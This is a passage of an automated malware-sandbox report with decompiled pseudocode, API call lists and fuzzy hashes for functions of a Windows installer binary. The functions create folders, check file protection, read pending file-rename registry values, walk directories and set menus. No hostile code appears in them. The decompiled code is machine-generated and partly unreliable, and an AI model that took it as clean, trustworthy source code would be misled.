				_v9 = __ecx;
				_v8 = __edx;
				_t133 = __eax;
				E00403870(_v8);
				_push(_t174);
				_push(0x468181);
				_push( *[fs:eax]);
				 *[fs:eax] = _t174 + 0xffffffd0;
				_v10 = 0;
				E0042C8F0(_v8,  &_v20);
				E0042CC98(_v20, _t135,  &_v16, _t176);
				E004035DC( &_v8, _v16);
				E0042CA18(_v8, _t135,  &_v16);
				_t177 = _v16;
				if(_v16 == 0) {
					L16:
					_pop(_t153);
					 *[fs:eax] = _t153;
					_push(0x468188);
					E00403568( &_v48, 2);
					E00403568( &_v20, 2);
					return E00403548( &_v8);
				}
				_t92 = E00451474(_t133, _v8, _t177); // executed
				if(_t92 == 0) {
					_push(_a4);
					E0042C990(_v8, _t135,  &_v16);
					_push(_v16);
					_t138 =  *0x468194; // 0x2
					_pop(_t158); // executed
					E00467F84(_t133, _t133,  !_t138 & _v9, _t158, __edi, __esi, __eflags); // executed
					_v28 = _v8;
					_v24 = 0xb;
					_t142 = 0;
					E00455A04("Creating directory: %s", _t133, 0,  &_v28, __edi, __esi);
					_t103 = E00451384(_t133, _v8, __eflags); // executed
					__eflags = _t103;
					if(_t103 == 0) {
						_t133 = GetLastError();
						E00450C5C(0x2f,  &_v20, _v8);
						_v40 = _v20;
						E00406E04(_t133,  &_v44);
						_v36 = _v44;
						E0042E7A4(_t133,  &_v48);
						_v32 = _v48;
						E00450C2C(0x60, 2,  &_v40,  &_v16);
						_t142 = _v16;
						E00408DF0(_v16, 1);
						E00403264();
					}
					_v10 = 1;
					__eflags = _v9 & 0x00000008;
					if((_v9 & 0x00000008) != 0) {
						SHChangeNotify(8, 1, E00403880(_v8), 0);
						E0042C990(_v8, _t142,  &_v16);
						SHChangeNotify(0x1000, 0x1001, E00403880(_v16), 0);
					}
					L8:
					if((_v9 & 0x00000004) == 0) {
						__eflags = _v9 & 0x00000001;
						if((_v9 & 0x00000001) == 0) {
							_t171 = 2;
							__eflags = _t133;
							if(_t133 != 0) {
								_t171 = 0x22;
								__eflags = 2;
							}
							__eflags = _v9 & 0x00000008;
							if((_v9 & 0x00000008) != 0) {
								__eflags = _t171;
							}
							_v52 = _v8;
							E00456F28( *((intOrPtr*)(_a4 - 4)), _t133,  &_v52, 0x81, _t169, _t171, _t171, 0);
						}
					} else {
						_t108 =  *0x4ae274; // 0x21d2bb8
						 *((intOrPtr*)( *_t108 + 0x30))();
					}
					goto L16;
				}
				if((_v9 & 0x00000002) == 0) {
					goto L16;
				} else {
					goto L8;
				}
			}

0x00467f84
0x00467f84
0x00467f84
0x00467f8b
0x00467f8c
0x00467f8f
0x00467f92
0x00467f95
0x00467f98
0x00467f9b
0x00467f9e
0x00467fa1
0x00467fa6
0x00467fad
0x00467fae
0x00467fb3
0x00467fb6
0x00467fb9
0x00467fc3
0x00467fce
0x00467fd9
0x00467fe4
0x00467fe9
0x00467fed
0x00468151
0x00468153
0x00468156
0x00468159
0x00468166
0x00468173
0x00468180
0x00468180
0x00467ff8
0x00467fff
0x00468013
0x0046801a
0x00468022
0x00468023
0x00468030
0x00468031
0x0046803a
0x0046803d
0x00468044
0x0046804b
0x00468055
0x0046805a
0x0046805c
0x00468063
0x00468071
0x00468079
0x00468081
0x00468089
0x00468091
0x00468099
0x004680a6
0x004680ab
0x004680b5
0x004680ba
0x004680ba
0x004680bf
0x004680c3
0x004680c7
0x004680d8
0x004680e5
0x004680fd
0x004680fd
0x00468102
0x00468106
0x0046811b
0x0046811f
0x00468121
0x00468126
0x00468128
0x0046812a
0x0046812a
0x0046812a
0x0046812d
0x00468131
0x00468133
0x00468133
0x0046813c
0x0046814c
0x0046814c
0x00468108
0x0046810f
0x00468116
0x00468116
0x00000000
0x00468106
0x00468005
0x00000000
0x0046800b
0x00000000
0x0046800b

APIs

Part of subcall function 0042C8F0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C914

Part of subcall function 0042CC98: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CDDE,00000000,0042CE04,?,?,?,00000000,00000000,?,0042CE19), ref: 0042CCC0

GetLastError.KERNEL32(00000000,00468181,?,?,00000001,004AE064), ref: 0046805E
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 004680D8
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004680FD

Strings

Creating directory: %s, xrefs: 00468046

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ChangeNotify$CharErrorFullLastNamePathPrev
String ID: Creating directory: %s
API String ID: 2168629741-483064649
Opcode ID: 47554987c74b114e7e9a2bcecbefe1ea355314d92b3ac265f6fb170d0ed0199d
Instruction ID: f1b2a4cafaf6ddfc000fb5e079bd43f232d8e99a75aeb5104ee6fa7654b5a80a
Opcode Fuzzy Hash: 47554987c74b114e7e9a2bcecbefe1ea355314d92b3ac265f6fb170d0ed0199d
Instruction Fuzzy Hash: 68514374E00248ABDB01DFA5C982BDEB7F5AF09304F5085AAEC50B7382DB785E05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004532AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004532AC(void* __eax, void* __ebx, void* __edx, void* __edi, intOrPtr __esi) {
				char _v8;
				short _v8200;
				char _v8204;
				char _v8208;
				char _v8212;
				void* _t29;
				int _t41;
				void* _t46;
				intOrPtr _t62;
				char _t64;
				intOrPtr _t72;
				void* _t82;
				void* _t85;
				void* _t86;

				_t83 = __esi;
				_t85 = _t86;
				_push(__eax);
				_t29 = 2;
				do {
					_t86 = _t86 + 0xfffff004;
					_push(_t29);
					_t29 = _t29 - 1;
				} while (_t29 != 0);
				_push(__ebx);
				_push(__esi);
				_v8204 = 0;
				_v8208 = 0;
				_v8212 = 0;
				_v8 = 0;
				_t82 = __edx;
				_t64 = _v8;
				_push(_t85);
				_push(0x453420);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86 + 0xfffffff4;
				if( *0x48dee4 == 0) {
					E0042D8E0( &_v8212);
					E0042C614(_v8212,  &_v8208);
					E004036C4( &_v8208, "sfc.dll");
					E00403674( &_v8204, E00403880(_v8208));
					_t62 = E0042E324(_v8204, _t64, 0x8000); // executed
					_t83 = _t62;
					if(_t83 != 0) {
						_push("SfcIsFileProtected");
						_push(_t83);
						L00405AA4();
						 *0x48dee8 = _t62;
					}
					 *0x48dee4 = 1;
				}
				if( *0x48dee8 != 0) {
					E0042C8F0(_t82,  &_v8);
					if(_t64 == 0) {
						E00452228(_v8, _t64, 0,  &_v8204, _t82, _t83);
						E004035DC( &_v8, _v8204);
					}
					_t41 = E004036BC(_v8);
					 *((short*)(_t85 + MultiByteToWideChar(0, 0, E00403880(_v8), _t41,  &_v8200, 0xfff) * 2 - 0x2004)) = 0;
					if(_v8200 == 0) {
						L11:
					} else {
						_t46 =  *0x48dee8(0,  &_v8200); // executed
						if(_t46 == 0) {
							goto L11;
						}
					}
				}
				_pop(_t72);
				 *[fs:eax] = _t72;
				_push(0x453427);
				E00403568( &_v8212, 3);
				return E00403548( &_v8);
			}

0x004532ac
0x004532ad
0x004532af
0x004532b0
0x004532b5
0x004532b5
0x004532bb
0x004532bc
0x004532bc
0x004532c5
0x004532c6
0x004532ca
0x004532d0
0x004532d6
0x004532dc
0x004532df
0x004532e1
0x004532e5
0x004532e6
0x004532eb
0x004532ee
0x004532f8
0x00453300
0x00453311
0x00453321
0x00453339
0x00453349
0x0045334e
0x00453352
0x00453354
0x00453359
0x0045335a
0x0045335f
0x0045335f
0x00453364
0x00453364
0x00453372
0x0045337d
0x00453384
0x0045338f
0x0045339d
0x0045339d
0x004533b1
0x004533c9
0x004533db
0x004533f0
0x004533dd
0x004533e6
0x004533ee
0x00000000
0x00000000
0x004533ee
0x004533db
0x004533fc
0x004533ff
0x00453402
0x00453412
0x0045341f

APIs

6D2B5550.KERNEL32(00000000,SfcIsFileProtected,00000000,00453420), ref: 0045335A
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00453420), ref: 004533C4

Strings

SfcIsFileProtected, xrefs: 00453354
sfc.dll, xrefs: 0045331C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550ByteCharMultiWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 1486418596-591603554
Opcode ID: c78a64a8ea2bc536e528b24bb65ce8b604f19c6fb4c15ab23a440f949b6fe2ba
Instruction ID: 73e14185f6058433241fe996a0a0b1c9f500e4f976e0f9fc4e1d160f36e0afea
Opcode Fuzzy Hash: c78a64a8ea2bc536e528b24bb65ce8b604f19c6fb4c15ab23a440f949b6fe2ba
Instruction Fuzzy Hash: DD418730A006149BEB21EF55DC85B9D77B8EB04346F5045BBF808A7292DB785F49CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00453EC4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41
registryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00453EC4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* __ebp;
				void* _t7;
				intOrPtr _t27;
				intOrPtr _t31;
				intOrPtr _t33;

				_t31 = _t33;
				_t7 = E0042DD88(0, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return _t7;
				} else {
					_push(_t31);
					_push(0x453f28);
					_push( *[fs:eax]);
					 *[fs:eax] = _t33;
					E00453DF8(_v8, __ebx, "PendingFileRenameOperations", __edi, __esi, _t31); // executed
					E00453DF8(_v8, __ebx, "PendingFileRenameOperations2", __edi, __esi, _t31); // executed
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x453f2f);
					return RegCloseKey(_v8);
				}
			}

0x00453ec5
0x00453edc
0x00453ee3
0x00453f31
0x00453ee5
0x00453ee7
0x00453ee8
0x00453eed
0x00453ef0
0x00453efc
0x00453f0b
0x00453f13
0x00453f16
0x00453f19
0x00453f27
0x00453f27

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegCloseKey.ADVAPI32(?,00453F2F,?,00000001,00000000), ref: 00453F22

Strings

PendingFileRenameOperations2, xrefs: 00453F03
PendingFileRenameOperations, xrefs: 00453EF4
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453ED0

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790Close
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 2256921126-2115312317
Opcode ID: 8f4bbfd5c4a88fed96999252ff7731529e2cb37fabbc43c1e63dad0514e6d855
Instruction ID: 59f0447b945b095b32d856da5494383e771bc026b9f52268d21fdf640b3719fa
Opcode Fuzzy Hash: 8f4bbfd5c4a88fed96999252ff7731529e2cb37fabbc43c1e63dad0514e6d855
Instruction Fuzzy Hash: C9F0C232A44208BBDB05DA65AC13A1AB3BDC744793FA0446BF80086682DA38AE04962C

Uniqueness

Uniqueness Score: -1.00%

Function 0046A180 Relevance: 6.3, APIs: 4, Instructions: 263
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0046A180(char __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v5;
				intOrPtr _v12;
				signed int _v16;
				signed int _v17;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				struct _WIN32_FIND_DATAA _v368;
				char _v372;
				char _v376;
				void* _t145;
				signed int _t146;
				intOrPtr _t153;
				intOrPtr _t157;
				signed int _t178;
				int _t181;
				signed char _t201;
				signed char _t202;
				int _t205;
				void* _t219;
				intOrPtr* _t229;
				intOrPtr _t245;
				intOrPtr _t258;
				intOrPtr _t275;
				intOrPtr _t283;
				void* _t294;
				void* _t295;
				intOrPtr _t296;

				_t292 = __esi;
				_t291 = __edi;
				_t294 = _t295;
				_t296 = _t295 + 0xfffffe8c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v372 = 0;
				_v376 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t294);
				_push(0x46a51f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t296;
				_push(_v12);
				_push(_v16);
				_push(_a20);
				E0040377C();
				_v17 = 0;
				_t241 =  &_v368;
				_t145 = E00451554(_v5,  &_v368, _v24, __eflags); // executed
				_v40 = _t145;
				if(_v40 == 0xffffffff) {
					_t146 = _a12;
					__eflags =  *(_t146 + 0x4c) & 0x00000020;
					if(( *(_t146 + 0x4c) & 0x00000020) == 0) {
						L23:
						__eflags = _v16;
						if(_v16 != 0) {
							_t153 = _a12;
							__eflags =  *(_t153 + 0x4d) & 0x00000002;
							if(( *(_t153 + 0x4d) & 0x00000002) != 0) {
								__eflags = _v17;
								if(_v17 == 0) {
									E004717F8( *((intOrPtr*)(_a12 + 4)), _t241,  &_v36);
									_t157 = _a12;
									__eflags =  *(_t157 + 0x4b) & 0x00000010;
									if(( *(_t157 + 0x4b) & 0x00000010) != 0) {
										E0042CA40(_v36, _t241,  &_v372);
										E00403708( &_v36, _v16, _v372);
									} else {
										E004036C4( &_v36, _v16);
									}
									_t245 =  *0x46a54c; // 0x0
									E00467F84(_v5, 0, _t245, _v36, _t291, _t292, __eflags,  *((intOrPtr*)(_a24 + 8)));
									_v17 = 1;
								}
							}
						}
						E00466CF4();
						__eflags = 0;
						_pop(_t258);
						 *[fs:eax] = _t258;
						_push(0x46a526);
						E00403568( &_v376, 2);
						return E00403568( &_v36, 4);
					} else {
						E004035DC( &_v372, _v12);
						E004036C4( &_v372, _v16);
						E004036C4( &_v372, 0x46a53c);
						_t241 =  &_v368;
						_v40 = E00451554(_v5,  &_v368, _v372, __eflags);
						__eflags = _v40 - 0xffffffff;
						if(_v40 == 0xffffffff) {
							goto L23;
						} else {
							__eflags = 0;
							_push(_t294);
							_push(0x46a473);
							_push( *[fs:eax]);
							 *[fs:eax] = _t296;
							do {
								_t178 = E004727E8( &_v368);
								__eflags = _t178;
								if(_t178 != 0) {
									E004035DC( &_v372, _v16);
									E004036A4( &_v376, 0x104,  &(_v368.cFileName));
									E004036C4( &_v372, _v376);
									E004036C4( &_v372, 0x46a548);
									_t201 = E0046A180(_v5, 0, _v372, _v12, _t291, _t292, __eflags, _a4, _a8, _a12, _a16, _a20, _a24) | _v17;
									__eflags = _t201;
									_v17 = _t201;
								}
								_t181 = FindNextFileA(_v40,  &_v368);
								__eflags = _t181;
							} while (_t181 != 0);
							__eflags = 0;
							_pop(_t275);
							 *[fs:eax] = _t275;
							_push(0x46a47a);
							return FindClose(_v40);
						}
					}
				} else {
					_push(_t294);
					_push(0x46a351);
					_push( *[fs:edx]);
					 *[fs:edx] = _t296;
					do {
						_t202 = _v368.dwFileAttributes;
						if((_t202 & 0x00000010) == 0) {
							if(_a16 == 0) {
								E004035DC( &_v28, _a20);
								L7:
								_v17 = 1;
								_push(_v12);
								_push(_v16);
								_push(_v28);
								E0040377C();
								E004717F8( *((intOrPtr*)(_a12 + 4)), _t241,  &_v36);
								if(( *(_a12 + 0x4b) & 0x00000010) != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										E0042CA40(_v36, _t241,  &_v372);
										_push(_v372);
										_push(_v16);
										E0042CA18(_v36, _t241,  &_v376);
										_push(_v376);
										E0040377C();
									}
								} else {
									_push(_v36);
									_push(_v16);
									_push(_v28);
									E0040377C();
								}
								_v44 = _v368.nFileSizeHigh;
								_v48 = _v368.nFileSizeLow;
								_t219 = E00430178( &_v48, _a4);
								_t304 = _t219;
								if(_t219 > 0) {
									_t229 = _a4;
									_v48 =  *_t229;
									_v44 =  *((intOrPtr*)(_t229 + 4));
								}
								E00468940(_a12, 0, _v32, _v5, _t291, _t292, _t304,  &_v48, _a8, _v36,  *((intOrPtr*)(_a24 + 8))); // executed
								_pop(_t241);
								E004301A0(_a4,  &_v48);
							} else {
								if((_t202 & 0x00000002) == 0) {
									_t241 = 0x104;
									E004036A4( &_v28, 0x104,  &(_v368.cFileName));
									goto L7;
								}
							}
						}
						_t205 = FindNextFileA(_v40,  &_v368); // executed
					} while (_t205 != 0);
					_pop(_t283);
					 *[fs:eax] = _t283;
					_push(0x46a358);
					return FindClose(_v40);
				}
			}

0x0046a180
0x0046a180
0x0046a181
0x0046a183
0x0046a189
0x0046a18a
0x0046a18b
0x0046a18e
0x0046a194
0x0046a19a
0x0046a19d
0x0046a1a0
0x0046a1a3
0x0046a1a6
0x0046a1a9
0x0046a1ac
0x0046a1b1
0x0046a1b2
0x0046a1b7
0x0046a1ba
0x0046a1bd
0x0046a1c0
0x0046a1c3
0x0046a1ce
0x0046a1d3
0x0046a1d7
0x0046a1e3
0x0046a1e8
0x0046a1ef
0x0046a358
0x0046a35b
0x0046a35f
0x0046a47a
0x0046a47a
0x0046a47e
0x0046a480
0x0046a483
0x0046a487
0x0046a489
0x0046a48d
0x0046a498
0x0046a49d
0x0046a4a0
0x0046a4a4
0x0046a4bc
0x0046a4cd
0x0046a4a6
0x0046a4ac
0x0046a4ac
0x0046a4d9
0x0046a4e5
0x0046a4eb
0x0046a4eb
0x0046a48d
0x0046a487
0x0046a4ef
0x0046a4f4
0x0046a4f6
0x0046a4f9
0x0046a4fc
0x0046a50c
0x0046a51e
0x0046a365
0x0046a36e
0x0046a37c
0x0046a38c
0x0046a397
0x0046a3a5
0x0046a3a8
0x0046a3ac
0x00000000
0x0046a3b2
0x0046a3b2
0x0046a3b4
0x0046a3b5
0x0046a3ba
0x0046a3bd
0x0046a3c0
0x0046a3c6
0x0046a3cb
0x0046a3cd
0x0046a3f0
0x0046a406
0x0046a417
0x0046a427
0x0046a43e
0x0046a43e
0x0046a441
0x0046a441
0x0046a44f
0x0046a454
0x0046a454
0x0046a45c
0x0046a45e
0x0046a461
0x0046a464
0x0046a472
0x0046a472
0x0046a3ac
0x0046a1f5
0x0046a1f7
0x0046a1f8
0x0046a1fd
0x0046a200
0x0046a203
0x0046a203
0x0046a20b
0x0046a215
0x0046a23a
0x0046a23f
0x0046a23f
0x0046a243
0x0046a246
0x0046a249
0x0046a254
0x0046a262
0x0046a26e
0x0046a288
0x0046a28c
0x0046a297
0x0046a29c
0x0046a2a2
0x0046a2ae
0x0046a2b3
0x0046a2c1
0x0046a2c1
0x0046a270
0x0046a270
0x0046a273
0x0046a276
0x0046a281
0x0046a281
0x0046a2cc
0x0046a2d5
0x0046a2de
0x0046a2e3
0x0046a2e5
0x0046a2e7
0x0046a2ec
0x0046a2f2
0x0046a2f2
0x0046a311
0x0046a316
0x0046a31d
0x0046a217
0x0046a219
0x0046a228
0x0046a22d
0x00000000
0x0046a22d
0x0046a219
0x0046a215
0x0046a32d
0x0046a332
0x0046a33c
0x0046a33f
0x0046a342
0x0046a350
0x0046a350

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0046A351,?,00000000,?,00000001,00000000,0046A51F,?,00000000,?,00000000,?,0046A6DA), ref: 0046A32D
FindClose.KERNEL32(000000FF,0046A358,0046A351,?,00000000,?,00000001,00000000,0046A51F,?,00000000,?,00000000,?,0046A6DA,?), ref: 0046A34B
FindNextFileA.KERNEL32(000000FF,?,00000000,0046A473,?,00000000,?,00000001,00000000,0046A51F,?,00000000,?,00000000,?,0046A6DA), ref: 0046A44F
FindClose.KERNEL32(000000FF,0046A47A,0046A473,?,00000000,?,00000001,00000000,0046A51F,?,00000000,?,00000000,?,0046A6DA,?), ref: 0046A46D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 294d79ef239de1fcae8baf2263a9889459780b3b46a448b2492d111743f09885
Instruction ID: a82012230103e7de8c84eb21cb6725401f41e223b04aad5c0a9f60ceb40b9f84
Opcode Fuzzy Hash: 294d79ef239de1fcae8baf2263a9889459780b3b46a448b2492d111743f09885
Instruction Fuzzy Hash: 9BB12D7490424DAFCF11DFA9C841ADEBBB8BF49304F5081AAE808B3351E7399A55CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0042148C Relevance: 6.1, APIs: 4, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042148C(void* __eax, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t42;
				struct HMENU__* _t51;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				void* _t67;
				void* _t82;
				intOrPtr _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				intOrPtr* _t88;

				_t88 = _t87 + 0xfffffff8;
				_t83 = __edx;
				_t67 = __eax;
				if(__edx == 0) {
					L7:
					_t23 =  *((intOrPtr*)(_t67 + 0x124));
					if( *((intOrPtr*)(_t67 + 0x124)) != 0) {
						E004126E8(_t23, 0);
					}
					 *((intOrPtr*)(_t67 + 0x124)) = _t83;
					if(_t83 != 0) {
						E004104F0(_t83, _t67);
					}
					if(_t83 == 0 || ( *(_t67 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t67 + 0x111)) == 3) {
						if(E00418590(_t67) != 0) {
							SetMenu(E004183F8(_t67), 0); // executed
						}
						goto L26;
					} else {
						if( *((char*)( *((intOrPtr*)(_t67 + 0x124)) + 0x34)) != 0 ||  *((char*)(_t67 + 0x116)) == 1) {
							if(( *(_t67 + 0x1c) & 0x00000010) == 0) {
								if( *((char*)(_t67 + 0x116)) != 1 && E00418590(_t67) != 0) {
									SetMenu(E004183F8(_t67), 0);
								}
								goto L26;
							}
							goto L17;
						} else {
							L17:
							if(E00418590(_t67) != 0) {
								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x124)))) + 0x2c))();
								if(_t42 != GetMenu(E004183F8(_t67))) {
									_t51 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x124)))) + 0x2c))();
									SetMenu(E004183F8(_t67), _t51);
								}
								E004126E8(_t83, E004183F8(_t67));
							}
							L26:
							if( *((char*)(_t67 + 0x115)) != 0) {
								E00422044(_t67, 0xf0c0, 1);
							}
							return E004213D4(_t67);
						}
					}
				}
				_t58 =  *0x48d62c; // 0x21d0660
				_t85 = E004233D4(_t58) - 1;
				if(_t85 >= 0) {
					_t86 = _t85 + 1;
					_t82 = 0;
					do {
						_t60 =  *0x48d62c; // 0x21d0660
						if(_t83 ==  *((intOrPtr*)(E004233C8(_t60) + 0x124))) {
							_t62 =  *0x48d62c; // 0x21d0660
							if(_t67 != E004233C8(_t62)) {
								 *_t88 =  *((intOrPtr*)(_t83 + 8));
								 *((char*)(_t88 + 4)) = 0xb;
								E00408F10(_t67, 0xf0c0, 1, _t82, _t83, 0, _t88);
								E00403264();
							}
						}
						_t82 = _t82 + 1;
						_t86 = _t86 - 1;
					} while (_t86 != 0);
				}
			}

0x00421490
0x00421493
0x00421495
0x00421499
0x004214fb
0x004214fb
0x00421503
0x00421507
0x00421507
0x0042150c
0x00421514
0x0042151a
0x0042151a
0x00421521
0x004215db
0x004215e7
0x004215e7
0x00000000
0x0042153a
0x00421544
0x00421553
0x004215b4
0x004215cb
0x004215cb
0x00000000
0x004215b4
0x00000000
0x00421555
0x00421555
0x0042155e
0x0042156c
0x00421580
0x0042158a
0x00421596
0x00421596
0x004215a6
0x004215a6
0x004215ec
0x004215f3
0x004215f9
0x004215f9
0x0042160b
0x0042160b
0x00421544
0x00421521
0x0042149b
0x004214a7
0x004214aa
0x004214ac
0x004214ad
0x004214af
0x004214b1
0x004214c1
0x004214c5
0x004214d1
0x004214d6
0x004214d9
0x004214ed
0x004214f2
0x004214f2
0x004214d1
0x004214f7
0x004214f8
0x004214f8
0x004214af

APIs

GetMenu.USER32(00000000), ref: 00421579
SetMenu.USER32(00000000,00000000), ref: 00421596
SetMenu.USER32(00000000,00000000), ref: 004215CB
SetMenu.USER32(00000000,00000000), ref: 004215E7

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 2d98442f7f3c7a24e9ece8491d25aa1f4834b78dbb4ad1e035a30f993f8538ab
Instruction ID: 3d42649376b66fd7527fa433ea7a01c3de4e88dfb28b703c9b8d1e7910d39afa
Opcode Fuzzy Hash: 2d98442f7f3c7a24e9ece8491d25aa1f4834b78dbb4ad1e035a30f993f8538ab
Instruction Fuzzy Hash: 2441C6307002641BD721BB3A988579A26954F95318F4805BFBD46DF3A7CE7DCC84875D

Uniqueness

Uniqueness Score: -1.00%

Function 004511E8 Relevance: 6.1, APIs: 4, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004511E8(void* __eax, void* __edx) {
				void* _v8;
				char _v9;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				void* _t29;
				intOrPtr _t36;
				intOrPtr _t46;
				intOrPtr _t52;
				void* _t56;
				intOrPtr _t67;
				intOrPtr _t69;
				void* _t72;
				void* _t81;
				void* _t86;
				void* _t88;
				intOrPtr _t89;

				_t86 = _t88;
				_t89 = _t88 + 0xffffffe8;
				_v8 = __edx;
				_t81 = __eax;
				_v9 = 0;
				_push( &_v16);
				_t29 = E00403880(__eax);
				_t72 = _t29;
				_push(_t72); // executed
				L00405C94(); // executed
				_t56 = _t29;
				if(_t56 <= 0) {
					__eflags =  *0x48c0e0 - 1;
					if(__eflags == 0) {
						L10:
						return _v9;
					} else {
						_v20 = E00451030(_t81, __eflags);
						__eflags = _v20;
						if(_v20 == 0) {
							goto L10;
						} else {
							_push(_t86);
							_push(0x4512f6);
							_push( *[fs:eax]);
							 *[fs:eax] = _t89;
							_push( &_v28);
							_push( &_v24);
							_push(E00451308);
							_t36 = _v20;
							_push(_t36);
							L00405C9C();
							__eflags = _t36;
							if(_t36 != 0) {
								memcpy(_v8, _v24, 0xd << 2);
								_v9 = 1;
							}
							__eflags = 0;
							_pop(_t67);
							 *[fs:eax] = _t67;
							_push(E004512FD);
							return E00402668(_v20);
						}
					}
				} else {
					_v20 = E00402650(_t56);
					_push(_t86);
					_push(0x451283);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v20);
					_push(_t56);
					_t46 = _v16;
					_push(_t46);
					_push(_t72); // executed
					L00405C8C(); // executed
					if(_t46 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E00451308);
						_t52 = _v20;
						_push(_t52);
						L00405C9C();
						if(_t52 != 0) {
